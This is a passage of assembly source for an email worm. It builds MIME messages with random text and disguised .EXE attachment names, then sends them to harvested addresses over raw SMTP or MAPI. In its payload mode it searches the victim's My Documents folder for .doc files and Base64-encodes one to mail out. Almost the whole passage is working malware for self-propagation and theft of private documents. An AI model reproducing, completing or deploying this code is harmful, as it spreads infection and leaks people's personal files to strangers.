push offset MessageBody1 ; Mime bordel jusqu'a -> email message
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuiltEmailMessage:
|
|||
|
push NbRndText ; nb Text
|
|||
|
pop edi
|
|||
|
call GetRndNumber ; edx = rnd nb
|
|||
|
|
|||
|
lea edi, RndTextTb
|
|||
|
rol edx, 2 ; table de dd
|
|||
|
add edi, edx ; Point the right Text offset
|
|||
|
mov edi, [edi]
|
|||
|
|
|||
|
push edi ; Rnd Text
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildBody1b:
|
|||
|
push offset MessageBody1b ; email message -> name=
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
cmp byte ptr[PayloadFlag],0
|
|||
|
jne BuildFileNamePay
|
|||
|
|
|||
|
BuildFileNameNormal:
|
|||
|
push NbRndFileName ; nb FileName
|
|||
|
pop edi
|
|||
|
call GetRndNumber ; edx = rnd nb
|
|||
|
|
|||
|
lea edi, RndFileNameTb
|
|||
|
rol edx, 2 ; table de dd
|
|||
|
add edi, edx ; Point the right Text offset
|
|||
|
mov edi, [edi]
|
|||
|
|
|||
|
push edi ; Rnd File in name=
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset MessageBody1c ; .EXE",CRLF -> filename=
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push edi ; Rnd File in filename=
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
jmp BuildSizeBody1
|
|||
|
|
|||
|
BuildFileNamePay:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 260
|
|||
|
push offset TempPath&Name
|
|||
|
push offset MyPath
|
|||
|
api GetFileTitleA
|
|||
|
|
|||
|
@pushsz '"'
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset TempPath&Name
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz '"'
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset MessageBody1c ; .EXE",CRLF -> filename=
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz '"'
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset TempPath&Name
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz '"'
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildSizeBody1:
|
|||
|
push esi
|
|||
|
api lstrlen
|
|||
|
|
|||
|
mov dword ptr[MessageSize1], eax ; Header+Mime bordel lenght for send cmd
|
|||
|
|
|||
|
BuildMessageHeaderError:
|
|||
|
pop ebx ; for the loop
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Payload Init The Attachement File
|
|||
|
|
|||
|
PayloadSendInit:
|
|||
|
push ebx ; For The send Loop
|
|||
|
|
|||
|
mov edi, dword ptr[NbPersonalFound] ; Rnd Range
|
|||
|
call GetRndNumber ; Rnd Nb in edx
|
|||
|
|
|||
|
PayMapiSendInit:
|
|||
|
xor al,al
|
|||
|
mov ecx,260
|
|||
|
lea edi, MyPath
|
|||
|
rep stosb
|
|||
|
|
|||
|
mov esi, dword ptr [PersoDocListe]
|
|||
|
rol edx, 8
|
|||
|
add esi, edx ; esi = perso doc path
|
|||
|
lea edi, MyPath
|
|||
|
mov ecx, 256 ; Perso path size
|
|||
|
rep movsb
|
|||
|
|
|||
|
PaySmtpSendInit:
|
|||
|
call CodeB64File ; return perso file encoded in mem
|
|||
|
|
|||
|
pop ebx ; For The send Loop
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Some Mem For The Mime Header
|
|||
|
|
|||
|
ReleasePayMem:
|
|||
|
push ebx
|
|||
|
|
|||
|
mov ecx, dword ptr [MemEncoded]
|
|||
|
call MemFreeIt
|
|||
|
mov ecx, dword ptr [MemToEncode]
|
|||
|
call MemFreeIt
|
|||
|
|
|||
|
pop ebx
|
|||
|
ret
|
|||
|
|
|||
|
ClearHeaderMem:
|
|||
|
xor al,al
|
|||
|
mov ecx, MimeHeaderSize
|
|||
|
mov edi, dword ptr[MemMessageBody1]
|
|||
|
rep stosb
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Some Mem For The Mime Header
|
|||
|
|
|||
|
ResMemHeader:
|
|||
|
xor eax,eax
|
|||
|
push PAGE_READWRITE ; read/write page
|
|||
|
push MEM_RESERVE or MEM_COMMIT
|
|||
|
push MimeHeaderSize
|
|||
|
push eax ; System decide where
|
|||
|
api VirtualAlloc
|
|||
|
mov dword ptr[MemMessageBody1], eax
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Map The Email File
|
|||
|
|
|||
|
;OUT: eax = mapaddress
|
|||
|
; cf = 0 if no error
|
|||
|
|
|||
|
MapEmailFile:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 260
|
|||
|
push offset TempPath&Name
|
|||
|
api GetSystemDirectoryA
|
|||
|
@pushsz '\ICMAIL.DLL'
|
|||
|
push offset TempPath&Name
|
|||
|
api lstrcat ; Path+Name
|
|||
|
|
|||
|
call Open&MapFile
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;.......................... Send Via MAPI ....................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
|
|||
|
MapiSend:
|
|||
|
push ebx ; For The send Loop
|
|||
|
|
|||
|
xor eax, eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push offset MapiMessage
|
|||
|
push eax
|
|||
|
push dword ptr [MAPISession]
|
|||
|
api MAPISendMail
|
|||
|
|
|||
|
pop ebx ; For The send Loop
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;........................... Send via SMTP ...................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
; 4 Part:
|
|||
|
; - GetLocalSmtpServeur: Find default SMTP server
|
|||
|
; - SmtpConnection: Init Socket + Connect to Smpt host
|
|||
|
; - SmtpSendCommand: Send all the commands
|
|||
|
; - SmtpDisConnection: Clean + Disconnect
|
|||
|
|
|||
|
|
|||
|
;.............. Get User Server
|
|||
|
|
|||
|
GetUserSmtpServer:
|
|||
|
|
|||
|
GetUserInternetAccount:
|
|||
|
mov dword ptr[KeySize], 00000040h ; Init Size to get
|
|||
|
|
|||
|
push offset KeySize
|
|||
|
push offset AccountSubKey
|
|||
|
push offset Reg
|
|||
|
@pushsz "Default Mail Account"
|
|||
|
@pushsz "Software\Microsoft\Internet Account Manager"
|
|||
|
push 80000001h
|
|||
|
api SHGetValueA
|
|||
|
test eax, eax
|
|||
|
jne GetUserSmtpServerError
|
|||
|
|
|||
|
GetUserInternetServer:
|
|||
|
mov dword ptr[KeySize], 00000040h ; Init Size to get
|
|||
|
|
|||
|
push offset KeySize
|
|||
|
push offset SmtpServeur
|
|||
|
push offset Reg
|
|||
|
@pushsz "SMTP Server"
|
|||
|
lea eax, AccountKey
|
|||
|
push eax
|
|||
|
push 80000001h
|
|||
|
api SHGetValueA
|
|||
|
test eax, eax
|
|||
|
jne GetUserSmtpServerError
|
|||
|
clc
|
|||
|
ret
|
|||
|
GetUserSmtpServerError:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Smtp Connection
|
|||
|
|
|||
|
SmtpConnection:
|
|||
|
pushad
|
|||
|
push offset WSAData ; Struct WSA
|
|||
|
push 101h ; VERSION1_1
|
|||
|
api WSAStartup ; Socket Init
|
|||
|
test eax,eax ; ok ?
|
|||
|
jne WSA_Error ; No, exit with stc
|
|||
|
|
|||
|
push 0 ; Protocol = 0 (more sure)
|
|||
|
push 1 ; SOCK_STREAM
|
|||
|
push 2 ; AF_INET (most used)
|
|||
|
api socket ; create socket
|
|||
|
inc eax ; -1 = error
|
|||
|
je Socket_Error ; WSACleanUp and stc
|
|||
|
dec eax
|
|||
|
mov [hSocket],eax ; Socket Handle
|
|||
|
|
|||
|
push 25 ; Smtp port
|
|||
|
api htons ; Convert it
|
|||
|
mov word ptr[wsocket+2], ax ; The port ( 2 ptr[wsocket]=AF_INET )
|
|||
|
|
|||
|
push offset SmtpServeur ; The SMPT Host
|
|||
|
api gethostbyname ; SMPT to IP
|
|||
|
test eax,eax ; error ?
|
|||
|
je Error_CloseSocket&CleanUp ; Exit + stc
|
|||
|
mov eax,[eax+10h] ; get ptr 2 IP into HOSTENT
|
|||
|
mov eax,[eax] ; get ptr 2 IP
|
|||
|
mov [ServeurIP],eax ; Save it
|
|||
|
|
|||
|
push 010h ; size of sockaddr struct
|
|||
|
push offset wsocket ; Ptr on it
|
|||
|
push [hSocket] ; Handle
|
|||
|
api connect ; connect to smtp server
|
|||
|
inc eax
|
|||
|
je Error_CloseSocket&CleanUp ; Exit + stc
|
|||
|
call GetServeurReply ; get server response
|
|||
|
jc Error_CloseSocket&CleanUp ; If c=0 Connection OK !
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
GetServeurReply:
|
|||
|
push 0 ; Flags
|
|||
|
push 4 ; Get a LongWord
|
|||
|
push offset ServeurReply ; in ServeurReply
|
|||
|
push [hSocket]
|
|||
|
api recv ; get stmp server error code
|
|||
|
cmp eax, 4 ; Receive a LongWord
|
|||
|
jne ReplyError ; No, stc
|
|||
|
|
|||
|
ServeurReplyLoop:
|
|||
|
mov ebx, offset ServeurReplyEnd ; Get a byte In
|
|||
|
push 0 ; Flags
|
|||
|
push 1 ; a byte
|
|||
|
push ebx
|
|||
|
push [hSocket]
|
|||
|
api recv
|
|||
|
jne ReplyError
|
|||
|
|
|||
|
cmp byte ptr [ebx], 0Ah
|
|||
|
jne ServeurReplyLoop ; skip over CRLF
|
|||
|
|
|||
|
mov eax, [ServeurReply]
|
|||
|
cmp eax, ' 022'
|
|||
|
je ReplyOk
|
|||
|
cmp eax, ' 052'
|
|||
|
je ReplyOk
|
|||
|
cmp eax, ' 152'
|
|||
|
je ReplyOk
|
|||
|
cmp eax, ' 453'
|
|||
|
jne ReplyError
|
|||
|
ReplyOk:
|
|||
|
clc
|
|||
|
ret
|
|||
|
ReplyError:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Smtp DisConnection
|
|||
|
|
|||
|
SmtpDisConnection:
|
|||
|
pushad
|
|||
|
Error_CloseSocket&CleanUp:
|
|||
|
push dword ptr [hSocket]
|
|||
|
api closesocket
|
|||
|
Socket_Error:
|
|||
|
api WSACleanup
|
|||
|
WSA_Error:
|
|||
|
popad
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Smtp Send
|
|||
|
|
|||
|
SmtpSendCommand:
|
|||
|
pushad
|
|||
|
|
|||
|
SendHelloCmd:
|
|||
|
mov esi,offset cmd_helo ; 'HELO xxx',CRLF
|
|||
|
push 14 ; cmd size
|
|||
|
pop ecx ; cmd size
|
|||
|
call SendSocket ; send HELO command
|
|||
|
call GetServeurReply ; Ok ?
|
|||
|
jc Error_CloseSocket&CleanUp ; No
|
|||
|
|
|||
|
SendMailFromCmd:
|
|||
|
mov esi,offset cmd_mailfrom ; 'MAIL FROM:<'
|
|||
|
push 11 ; cmd size
|
|||
|
pop ecx ; size
|
|||
|
call SendSocket ; send MAIL FROM command
|
|||
|
|
|||
|
mov esi,offset mailfrom ; ptr default user email
|
|||
|
push esi
|
|||
|
api lstrlen
|
|||
|
xchg ecx, eax
|
|||
|
call SendSocket ; 2<> Write xxxx@xxxx.xx
|
|||
|
|
|||
|
call Brk1
|
|||
|
db '>',CRLF
|
|||
|
Brk1: pop esi
|
|||
|
push 3
|
|||
|
pop ecx
|
|||
|
call SendSocket ; 3<> Write '>',CRLF
|
|||
|
|
|||
|
call GetServeurReply ; Ok
|
|||
|
jc Error_CloseSocket&CleanUp ; No
|
|||
|
|
|||
|
SendRcptToCmd:
|
|||
|
mov esi,offset cmd_rcptto ; 'RCPT TO:<'
|
|||
|
push 9 ; cmd size
|
|||
|
pop ecx ; cmd size
|
|||
|
call SendSocket ; 1<> Write 'RCPT TO:<'
|
|||
|
|
|||
|
mov esi,offset CurrentEmail ; ptr email
|
|||
|
push esi
|
|||
|
api lstrlen
|
|||
|
xchg ecx, eax
|
|||
|
call SendSocket ; 2<> Write xxxx@xxxx.xx
|
|||
|
|
|||
|
call Brk2
|
|||
|
db '>',CRLF
|
|||
|
Brk2: pop esi
|
|||
|
push 3
|
|||
|
pop ecx
|
|||
|
call SendSocket ; 3<> Write '>',CRLF
|
|||
|
|
|||
|
call GetServeurReply ; Ok
|
|||
|
jc Error_CloseSocket&CleanUp ; No
|
|||
|
|
|||
|
SendDataCmd:
|
|||
|
mov esi,offset cmd_data ; 'DATA',CRLF
|
|||
|
push 6 ; Size
|
|||
|
pop ecx ; Size
|
|||
|
call SendSocket ; send DATA command
|
|||
|
call GetServeurReply ; Ok
|
|||
|
jc Error_CloseSocket&CleanUp ; No
|
|||
|
|
|||
|
SendeMailBody:
|
|||
|
mov esi, dword ptr[MemMessageBody1] ; Start Message Body
|
|||
|
mov ecx, dword ptr[MessageSize1]
|
|||
|
call SendSocket
|
|||
|
|
|||
|
mov esi,dword ptr [MemEncoded] ; Encoded File
|
|||
|
mov ecx,dword ptr [EncodedFileSize]
|
|||
|
call SendSocket
|
|||
|
|
|||
|
mov esi, offset MessageBody2 ; End Message Body
|
|||
|
mov ecx, MessageSize2
|
|||
|
call SendSocket
|
|||
|
|
|||
|
SendTermCmd:
|
|||
|
mov esi,offset cmd_term ; CRLF,'.',CRLF
|
|||
|
push 5 ; size
|
|||
|
pop ecx ; size
|
|||
|
call SendSocket ; send message header+body
|
|||
|
call GetServeurReply ; Ok ?
|
|||
|
jc Error_CloseSocket&CleanUp ; No
|
|||
|
|
|||
|
SendQuitCmd:
|
|||
|
mov esi,offset cmd_quit ; 'QUIT',CRLF
|
|||
|
push 6 ; size
|
|||
|
pop ecx ; size
|
|||
|
call SendSocket ; send QUIT command
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
SendSocket:
|
|||
|
push 0 ; Flags
|
|||
|
push ecx ; size
|
|||
|
push esi ; Source
|
|||
|
push [hSocket] ; Handle
|
|||
|
api send
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;........................ Minor Sub Routine ..................................
|
|||
|
;............................ Z O N E ........................................
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
;........................ Open & Map a File ..................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
|
|||
|
; IN: TempPath&Name = Path + Name of file to Open
|
|||
|
; OUT: fhandle, maphandle, mapaddress
|
|||
|
; cf = 0 ou 1
|
|||
|
|
|||
|
Open&MapFile:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push eax
|
|||
|
push FILE_SHARE_READ
|
|||
|
push GENERIC_READ or GENERIC_WRITE
|
|||
|
push Offset TempPath&Name
|
|||
|
api CreateFileA
|
|||
|
inc eax
|
|||
|
je Open&MapFileError
|
|||
|
dec eax
|
|||
|
mov dword ptr [fhandle], eax
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push PAGE_READWRITE
|
|||
|
push eax
|
|||
|
push dword ptr [fhandle]
|
|||
|
api CreateFileMappingA
|
|||
|
or eax,eax
|
|||
|
jz Open&MapFileCloseFileHandle
|
|||
|
mov dword ptr [maphandle],eax
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push FILE_MAP_WRITE
|
|||
|
push eax
|
|||
|
api MapViewOfFile
|
|||
|
or eax,eax
|
|||
|
jz Open&MapFileCloseMapHandle
|
|||
|
mov dword ptr [mapaddress], eax
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
Open&MapFileUnmapView:
|
|||
|
push dword ptr [mapaddress]
|
|||
|
api UnmapViewOfFile
|
|||
|
|
|||
|
Open&MapFileCloseMapHandle:
|
|||
|
push dword ptr [maphandle]
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
Open&MapFileCloseFileHandle:
|
|||
|
push dword ptr [fhandle]
|
|||
|
api CloseHandle
|
|||
|
Open&MapFileError:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
;...................... Search Personal Documents ............................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
; OUT - Personal Doc Path in Mem in $ [PersoDocListe]
|
|||
|
|
|||
|
PersonalDocSearch:
|
|||
|
xor eax,eax
|
|||
|
push PAGE_READWRITE ; read/write page
|
|||
|
push MEM_RESERVE or MEM_COMMIT
|
|||
|
push PersoFileSize
|
|||
|
push eax ; System decide where
|
|||
|
api VirtualAlloc
|
|||
|
test eax, eax
|
|||
|
je PersonalDocSearchError
|
|||
|
mov dword ptr[PersoDocListe], eax
|
|||
|
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 00h
|
|||
|
push 05h ; Personal Path
|
|||
|
push offset TempPath&Name
|
|||
|
push 00h
|
|||
|
api SHGetSpecialFolderPathA
|
|||
|
|
|||
|
push offset TempPath&Name
|
|||
|
api SetCurrentDirectoryA ; Selected dir = Personal Path
|
|||
|
|
|||
|
lea eax, FindPersonalFile
|
|||
|
mov dword ptr[RoutineToCall], eax
|
|||
|
call AllSubDirSearch ; Action = FindPersonalFile
|
|||
|
PersonalDocSearchError:
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Search Personal File
|
|||
|
|
|||
|
FindPersonalFile:
|
|||
|
cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File
|
|||
|
je NoMorePersonalFile
|
|||
|
|
|||
|
push offset search
|
|||
|
@pushsz "*.doc"
|
|||
|
api FindFirstFileA
|
|||
|
|
|||
|
mov dword ptr [PersonalSearchHandle], eax
|
|||
|
inc eax
|
|||
|
jz NoMorePersonalFile
|
|||
|
|
|||
|
PersonalDocumentFound:
|
|||
|
mov edi, dword ptr[PersoDocListe]
|
|||
|
mov edx, dword ptr[NbPersonalFound]
|
|||
|
rol edx, 8
|
|||
|
add edi, edx ; Right Pos
|
|||
|
|
|||
|
push edi
|
|||
|
push 260
|
|||
|
api GetCurrentDirectoryA ; The dir
|
|||
|
|
|||
|
@pushsz '\'
|
|||
|
push edi
|
|||
|
api lstrcat ; The \
|
|||
|
|
|||
|
push offset [search.FileName]
|
|||
|
push edi
|
|||
|
api lstrcat ; The Name
|
|||
|
|
|||
|
inc dword ptr[NbPersonalFound] ; Next One
|
|||
|
cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File
|
|||
|
je EnoughtPerso
|
|||
|
|
|||
|
FindPersonalFileNext:
|
|||
|
push offset search
|
|||
|
push dword ptr [PersonalSearchHandle]
|
|||
|
api FindNextFileA
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jnz PersonalDocumentFound
|
|||
|
|
|||
|
EnoughtPerso:
|
|||
|
push dword ptr [PersonalSearchHandle]
|
|||
|
api FindClose
|
|||
|
|
|||
|
NoMorePersonalFile:
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Search in all Sub Dir + Action in ............................
|
|||
|
|
|||
|
; IN: - Root dir Selected for the Search begin
|
|||
|
; - RoutineToCall = SeekHtmlCurrentDir
|
|||
|
; OUT: - What perform RoutineToCall in all subdir of selected Root
|
|||
|
|
|||
|
|
|||
|
AllSubDirSearch:
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
FindFirstDir:
|
|||
|
lea edi, search
|
|||
|
push edi
|
|||
|
@pushsz "*.*"
|
|||
|
api FindFirstFileA
|
|||
|
|
|||
|
mov dword ptr [RecSearchHandle],eax
|
|||
|
|
|||
|
inc eax
|
|||
|
jz FirstDirNotFound
|
|||
|
|
|||
|
DirTravel:
|
|||
|
bt word ptr[search.FileAttributes],4
|
|||
|
jnc FindNextDir
|
|||
|
|
|||
|
lea eax,[search.FileName]
|
|||
|
|
|||
|
cmp byte ptr [eax],"."
|
|||
|
jz FindNextDir
|
|||
|
|
|||
|
push eax
|
|||
|
api SetCurrentDirectoryA
|
|||
|
|
|||
|
InNewDir_Action:
|
|||
|
pushad
|
|||
|
call dword ptr[RoutineToCall] ; THE Action
|
|||
|
popad
|
|||
|
|
|||
|
push dword ptr [RecSearchHandle]
|
|||
|
inc ebx
|
|||
|
jmp FindFirstDir
|
|||
|
FindNextDir:
|
|||
|
push edi
|
|||
|
push dword ptr [RecSearchHandle]
|
|||
|
api FindNextFileA
|
|||
|
|
|||
|
or eax,eax
|
|||
|
jnz DirTravel
|
|||
|
|
|||
|
FirstDirNotFound:
|
|||
|
@pushsz ".."
|
|||
|
api SetCurrentDirectoryA
|
|||
|
|
|||
|
or ebx,ebx
|
|||
|
jz AllSubDirSearchEnd
|
|||
|
|
|||
|
dec ebx
|
|||
|
pop dword ptr [RecSearchHandle]
|
|||
|
jmp FindNextDir
|
|||
|
|
|||
|
NextDirNotFound:
|
|||
|
push dword ptr [RecSearchHandle]
|
|||
|
api FindClose
|
|||
|
jmp FirstDirNotFound
|
|||
|
|
|||
|
AllSubDirSearchEnd:
|
|||
|
ret
|
|||
|
|
|||
|
;.......................... Random Number ....................................
|
|||
|
|
|||
|
; IN: Edi
|
|||
|
; OUT: Random Number in EDX: 0 <-> Edi-1
|
|||
|
|
|||
|
GetRndNumber:
|
|||
|
push eax ebx ecx esi esp ebp
|
|||
|
|
|||
|
mov eax, dword ptr[RandomNb]
|
|||
|
mov ecx,41C64E6Dh
|
|||
|
mul ecx
|
|||
|
add eax,00003039h
|
|||
|
mov dword ptr[RandomNb], eax
|
|||
|
|
|||
|
xor edx, edx
|
|||
|
div edi ; Reste < Edi in EDX
|
|||
|
|
|||
|
pop ebp esp esi ecx ebx eax
|
|||
|
ret
|
|||
|
|
|||
|
;......................... Free The Mem ......................................
|
|||
|
|
|||
|
FreeTheMem:
|
|||
|
mov ecx, dword ptr[EmailList]
|
|||
|
jecxz FreeTheMemNext1
|
|||
|
call MemFreeIt
|
|||
|
|
|||
|
FreeTheMemNext1:
|
|||
|
mov ecx, dword ptr[MemMessageBody1]
|
|||
|
jecxz FreeTheMemNext2
|
|||
|
call MemFreeIt
|
|||
|
|
|||
|
FreeTheMemNext2:
|
|||
|
mov ecx, dword ptr[PersoDocListe]
|
|||
|
jecxz FreeTheMemFin
|
|||
|
call MemFreeIt
|
|||
|
|
|||
|
FreeTheMemFin:
|
|||
|
ret
|
|||
|
|
|||
|
MemFreeIt:
|
|||
|
push 00008000h ; MEM_RELEASE
|
|||
|
push 0
|
|||
|
push ecx
|
|||
|
api VirtualFree
|
|||
|
ret
|
|||
|
|
|||
|
;..................... Clear TempPath & Name .................................
|
|||
|
|
|||
|
Clear_TempPath&Name:
|
|||
|
xor al,al
|
|||
|
mov ecx,260
|
|||
|
lea edi,TempPath&Name ; Clear the path
|
|||
|
rep stosb
|
|||
|
ret
|
|||
|
|
|||
|
;..................... Encode File Base 64 ...................................
|
|||
|
|
|||
|
; IN: Path of the file in offset MyPath
|
|||
|
; OUT: Encoded file in Mem
|
|||
|
|
|||
|
CodeB64File:
|
|||
|
|
|||
|
OpenFileToEncode:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push eax
|
|||
|
push FILE_SHARE_READ
|
|||
|
push GENERIC_READ
|
|||
|
push Offset MyPath ; The file to encode
|
|||
|
api CreateFileA
|
|||
|
inc eax
|
|||
|
je CodeB64FileEnd
|
|||
|
dec eax
|
|||
|
mov dword ptr [TempFileHandle], eax
|
|||
|
|
|||
|
GetFileToEncodeSize:
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
api GetFileSize
|
|||
|
inc eax
|
|||
|
je CodeB64FileEnd
|
|||
|
dec eax
|
|||
|
mov dword ptr [OurSizeToEncode], eax
|
|||
|
|
|||
|
add eax, 1000 ; Security
|
|||
|
|
|||
|
GetMemToReadFileToEncode:
|
|||
|
xor ebx,ebx
|
|||
|
push PAGE_READWRITE ; read/write page
|
|||
|
push MEM_RESERVE or MEM_COMMIT
|
|||
|
push eax
|
|||
|
push ebx ; System decide where
|
|||
|
api VirtualAlloc
|
|||
|
test eax, eax
|
|||
|
je CodeB64FileEnd
|
|||
|
mov dword ptr[MemToEncode], eax
|
|||
|
|
|||
|
ReadFileToEncode:
|
|||
|
push 00h
|
|||
|
push offset ByteReaded
|
|||
|
push dword ptr [OurSizeToEncode]
|
|||
|
push eax
|
|||
|
push dword ptr [TempFileHandle]
|
|||
|
api ReadFile
|
|||
|
|
|||
|
push dword ptr [TempFileHandle]
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
GetMemToEncodeFile:
|
|||
|
mov eax, dword ptr [OurSizeToEncode]
|
|||
|
rol eax, 4 ; We need ori size *3 (+security)
|
|||
|
xor ebx,ebx
|
|||
|
push PAGE_READWRITE ; read/write page
|
|||
|
push MEM_RESERVE or MEM_COMMIT
|
|||
|
push eax
|
|||
|
push ebx ; System decide where
|
|||
|
api VirtualAlloc
|
|||
|
test eax, eax
|
|||
|
je CodeB64FileEnd
|
|||
|
mov dword ptr[MemEncoded], eax
|
|||
|
|
|||
|
AlignFileToEncodeSize:
|
|||
|
mov eax, dword ptr [OurSizeToEncode]
|
|||
|
push 3
|
|||
|
pop ecx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx ; align size to 3
|
|||
|
|
|||
|
EncodeFileNow:
|
|||
|
xchg eax,ecx
|
|||
|
mov edx,dword ptr [MemEncoded]
|
|||
|
mov eax,dword ptr [MemToEncode]
|
|||
|
call encodeBase64
|
|||
|
|
|||
|
mov dword ptr [EncodedFileSize],ecx
|
|||
|
|
|||
|
CodeB64FileEnd:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;................... Encode Base 64 Algorithme ...............................
|
|||
|
|
|||
|
encodeBase64: ; By Bumblebee
|
|||
|
; input:
|
|||
|
; EAX = Address of data to encode
|
|||
|
; EDX = Address to put encoded data
|
|||
|
; ECX = Size of data to encode
|
|||
|
; output:
|
|||
|
; ECX = size of encoded data
|
|||
|
;
|
|||
|
xor esi,esi
|
|||
|
call over_enc_table
|
|||
|
db "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
|||
|
db "abcdefghijklmnopqrstuvwxyz"
|
|||
|
db "0123456789+/"
|
|||
|
over_enc_table:
|
|||
|
pop edi
|
|||
|
push ebp
|
|||
|
xor ebp,ebp
|
|||
|
baseLoop:
|
|||
|
movzx ebx,byte ptr [eax]
|
|||
|
shr bl,2
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
mov bx,word ptr [eax]
|
|||
|
xchg bl,bh
|
|||
|
shr bx,4
|
|||
|
mov bh,0
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
inc eax
|
|||
|
mov bx,word ptr [eax]
|
|||
|
xchg bl,bh
|
|||
|
shr bx,6
|
|||
|
xor bh,bh
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
inc eax
|
|||
|
xor ebx,ebx
|
|||
|
movzx ebx,byte ptr [eax]
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
inc eax
|
|||
|
|
|||
|
inc ebp
|
|||
|
cmp ebp,24
|
|||
|
jna DontAddEndOfLine
|
|||
|
|
|||
|
xor ebp,ebp
|
|||
|
mov word ptr [edx+esi],0A0Dh
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
test al,00h
|
|||
|
org $-1
|
|||
|
DontAddEndOfLine:
|
|||
|
inc ebp
|
|||
|
sub ecx,3
|
|||
|
or ecx,ecx
|
|||
|
jne baseLoop
|
|||
|
|
|||
|
mov ecx,esi
|
|||
|
add edx,esi
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;------------------------------ Data Zone ------------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
|
|||
|
;-------------------------- Variables Zone -----------------------------------
|
|||
|
|
|||
|
SmtpFlag db 0 ; Select Mapi or Smtp
|
|||
|
PayloadFlag db 0 ; Payload = 1
|
|||
|
UserEmailFoundFlag db 0 ; found = 1
|
|||
|
|
|||
|
;...................... Encode B64 Variables
|
|||
|
|
|||
|
